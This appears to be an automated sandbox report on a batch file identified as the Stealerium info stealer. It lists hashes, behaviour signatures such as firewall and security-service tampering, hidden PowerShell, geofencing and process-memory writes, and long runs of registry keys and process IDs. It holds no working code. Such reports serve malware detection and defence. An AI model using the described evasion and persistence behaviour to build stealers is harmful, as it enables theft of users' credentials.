Analysis
-
max time kernel
145s -
max time network
116s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
31-05-2024 21:23
Static task
static1
Behavioral task
behavioral1
Sample
stub.bat
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
stub.bat
Resource
win10v2004-20240508-en
General
-
Target
stub.bat
-
Size
2.3MB
-
MD5
e49ed1028bf0c289d62cdca6b440d752
-
SHA1
e3f18d496cdb64b2e3388bfd579cfd59adc70752
-
SHA256
4d930eaabcd25150ee60e0f5f9147aedc06837c09a254186eaad4d78a118a782
-
SHA512
15f8d558479b7c03cecc7aa3ec734a762941d7b20a246cfad1e6f24aa8b6eadf351a48ca953dc5123429d52f7f0a20d21104f4ae52bdcbc584f26587be1e9604
-
SSDEEP
24576:gMID2TZRnCMGHJLYk5kqzJwwDxxBJOU7gqsiX5PFxobyCByo1/xdTYu3CgM0ZFwX:gMNXWjGCf2bu1j4R6A8
Malware Config
Signatures
-
Modifies firewall policy service 2 TTPs 3 IoCs
Processes:
svchost.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules\{D0FF0AAD-40EA-45AD-93E8-ADA577D530B7} = "v2.30|Action=Block|Active=TRUE|Dir=Out|Name=Microsoft Edge|Desc=Microsoft Edge Browser|LUOwn=S-1-5-21-2804150937-2146708401-419095071-1000|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|EmbedCtxt=Microsoft Edge|" svchost.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules svchost.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules\{70F8DF78-76DA-487B-B30E-7F910C063BF4} = "v2.30|Action=Block|Active=TRUE|Dir=In|Name=Microsoft Edge|Desc=Microsoft Edge Browser|LUOwn=S-1-5-21-2804150937-2146708401-419095071-1000|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|EmbedCtxt=Microsoft Edge|" svchost.exe -
Modifies security service 2 TTPs 4 IoCs
Processes:
svchost.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs\S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984S-1-5-21-2804150937-2146708401-419095071-1000 = "v2.30|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|LUOwn=S-1-5-21-2804150937-2146708401-419095071-1000|C=S-1-15-3-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|M=microsoft.microsoftedge.stable_8wekyb3d8bbwe|Name=Microsoft Edge|Desc=Microsoft Edge Browser|D=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\|PFN=Microsoft.MicrosoftEdge.Stable_92.0.902.67_neutral__8wekyb3d8bbwe|" svchost.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs svchost.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs\S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984S-1-5-21-2804150937-2146708401-419095071-1000 = "v2.30|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|LUOwn=S-1-5-21-2804150937-2146708401-419095071-1000|C=S-1-15-3-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|M=microsoft.microsoftedge.stable_8wekyb3d8bbwe|Name=Microsoft Edge|Desc=Microsoft Edge Browser|" svchost.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\PolicyVersion = "542" svchost.exe -
Stealerium
An open source info stealer written in C# first seen in May 2022.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 1312 powershell.exe 224 powershell.exe 3908 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops file in System32 directory 18 IoCs
Processes:
powershell.exesvchost.exesvchost.exesvchost.exesvchost.exedescription ioc process File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\ powershell.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File created C:\Windows\system32\SleepStudy\user-not-present-trace-2024-05-31-21-24-47.etl svchost.exe File opened for modification C:\Windows\system32\SleepStudy\user-not-present-trace-2024-05-31-21-24-47.etl svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1928 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 4812 taskkill.exe -
Processes:
svchost.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\ba248efc_0\ = "{2}.\\\\?\\hdaudio#func_01&ven_1af4&dev_0022&subsys_1af40022&rev_1001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\\elineouttopo/00010001|\\Device\\HarddiskVolume2\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe%b{00000000-0000-0000-0000-000000000000}" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\ba248efc_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F} svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\ba248efc_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\3 = 04000000000000000000803f000000000000000000000000 svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\ba248efc_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\4 = 0420000000000000180000000000000000000000000000000000803f0000803f svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\ba248efc_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\5 = 0b0000000000000000000000000000000000000000000000 svchost.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\ba248efc_0 svchost.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
svchost.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018C00DDF3C5ECE" svchost.exe -
Modifies registry class 40 IoCs
Processes:
svchost.exemsedge.exepowershell.exeExplorer.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133616643211638626" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App svchost.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1 svchost.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PTT = "133616643490084173" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133616643550329936" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133616643893470516" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133616643899251788" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PCT = "133616642873397775" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy svchost.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133616642966783190" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133616642859350863" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\ICT = "133596419434100487" svchost.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2804150937-2146708401-419095071-1000\{F9817FEF-F148-4AF2-9694-82B1F9FAEA89} msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133616643559219896" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133616643569560017" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133616643901126898" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU svchost.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\PCT = "133596419432069327" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133616643529773990" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133616642871381952" svchost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy svchost.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1 svchost.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133616642450986931" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133616643191529641" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133616642969723231" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133616642585600803" svchost.exe -
Suspicious behavior: EnumeratesProcesses 46 IoCs
Processes:
powershell.exepowershell.exepowershell.exemsedge.exemsedge.exeidentity_helper.exemsedge.exepid process 1312 powershell.exe 1312 powershell.exe 224 powershell.exe 224 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe 3124 msedge.exe 3124 msedge.exe 1140 msedge.exe 1140 msedge.exe 4488 identity_helper.exe 4488 identity_helper.exe 5836 msedge.exe 5836 msedge.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3340 Explorer.EXE -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
Processes:
msedge.exepid process 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1312 powershell.exe Token: SeDebugPrivilege 224 powershell.exe Token: SeIncreaseQuotaPrivilege 224 powershell.exe Token: SeSecurityPrivilege 224 powershell.exe Token: SeTakeOwnershipPrivilege 224 powershell.exe Token: SeLoadDriverPrivilege 224 powershell.exe Token: SeSystemProfilePrivilege 224 powershell.exe Token: SeSystemtimePrivilege 224 powershell.exe Token: SeProfSingleProcessPrivilege 224 powershell.exe Token: SeIncBasePriorityPrivilege 224 powershell.exe Token: SeCreatePagefilePrivilege 224 powershell.exe Token: SeBackupPrivilege 224 powershell.exe Token: SeRestorePrivilege 224 powershell.exe Token: SeShutdownPrivilege 224 powershell.exe Token: SeDebugPrivilege 224 powershell.exe Token: SeSystemEnvironmentPrivilege 224 powershell.exe Token: SeRemoteShutdownPrivilege 224 powershell.exe Token: SeUndockPrivilege 224 powershell.exe Token: SeManageVolumePrivilege 224 powershell.exe Token: 33 224 powershell.exe Token: 34 224 powershell.exe Token: 35 224 powershell.exe Token: 36 224 powershell.exe Token: SeIncreaseQuotaPrivilege 224 powershell.exe Token: SeSecurityPrivilege 224 powershell.exe Token: SeTakeOwnershipPrivilege 224 powershell.exe Token: SeLoadDriverPrivilege 224 powershell.exe Token: SeSystemProfilePrivilege 224 powershell.exe Token: SeSystemtimePrivilege 224 powershell.exe Token: SeProfSingleProcessPrivilege 224 powershell.exe Token: SeIncBasePriorityPrivilege 224 powershell.exe Token: SeCreatePagefilePrivilege 224 powershell.exe Token: SeBackupPrivilege 224 powershell.exe Token: SeRestorePrivilege 224 powershell.exe Token: SeShutdownPrivilege 224 powershell.exe Token: SeDebugPrivilege 224 powershell.exe Token: SeSystemEnvironmentPrivilege 224 powershell.exe Token: SeRemoteShutdownPrivilege 224 powershell.exe Token: SeUndockPrivilege 224 powershell.exe Token: SeManageVolumePrivilege 224 powershell.exe Token: 33 224 powershell.exe Token: 34 224 powershell.exe Token: 35 224 powershell.exe Token: 36 224 powershell.exe Token: SeIncreaseQuotaPrivilege 224 powershell.exe Token: SeSecurityPrivilege 224 powershell.exe Token: SeTakeOwnershipPrivilege 224 powershell.exe Token: SeLoadDriverPrivilege 224 powershell.exe Token: SeSystemProfilePrivilege 224 powershell.exe Token: SeSystemtimePrivilege 224 powershell.exe Token: SeProfSingleProcessPrivilege 224 powershell.exe Token: SeIncBasePriorityPrivilege 224 powershell.exe Token: SeCreatePagefilePrivilege 224 powershell.exe Token: SeBackupPrivilege 224 powershell.exe Token: SeRestorePrivilege 224 powershell.exe Token: SeShutdownPrivilege 224 powershell.exe Token: SeDebugPrivilege 224 powershell.exe Token: SeSystemEnvironmentPrivilege 224 powershell.exe Token: SeRemoteShutdownPrivilege 224 powershell.exe Token: SeUndockPrivilege 224 powershell.exe Token: SeManageVolumePrivilege 224 powershell.exe Token: 33 224 powershell.exe Token: 34 224 powershell.exe Token: 35 224 powershell.exe -
Suspicious use of FindShellTrayWindow 59 IoCs
Processes:
msedge.exepid process 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe -
Suspicious use of SendNotifyMessage 56 IoCs
Processes:
msedge.exepid process 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe 1140 msedge.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3340 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exesvchost.exedescription pid process target process PID 4628 wrote to memory of 1516 4628 cmd.exe cmd.exe PID 4628 wrote to memory of 1516 4628 cmd.exe cmd.exe PID 4628 wrote to memory of 1312 4628 cmd.exe powershell.exe PID 4628 wrote to memory of 1312 4628 cmd.exe powershell.exe PID 1312 wrote to memory of 224 1312 powershell.exe powershell.exe PID 1312 wrote to memory of 224 1312 powershell.exe powershell.exe PID 1312 wrote to memory of 4592 1312 powershell.exe WScript.exe PID 1312 wrote to memory of 4592 1312 powershell.exe WScript.exe PID 4592 wrote to memory of 2220 4592 WScript.exe cmd.exe PID 4592 wrote to memory of 2220 4592 WScript.exe cmd.exe PID 2220 wrote to memory of 808 2220 cmd.exe cmd.exe PID 2220 wrote to memory of 808 2220 cmd.exe cmd.exe PID 2220 wrote to memory of 3908 2220 cmd.exe powershell.exe PID 2220 wrote to memory of 3908 2220 cmd.exe powershell.exe PID 3908 wrote to memory of 3340 3908 powershell.exe Explorer.EXE PID 3908 wrote to memory of 392 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 1176 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 1564 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 2152 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 4852 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 4904 3908 powershell.exe 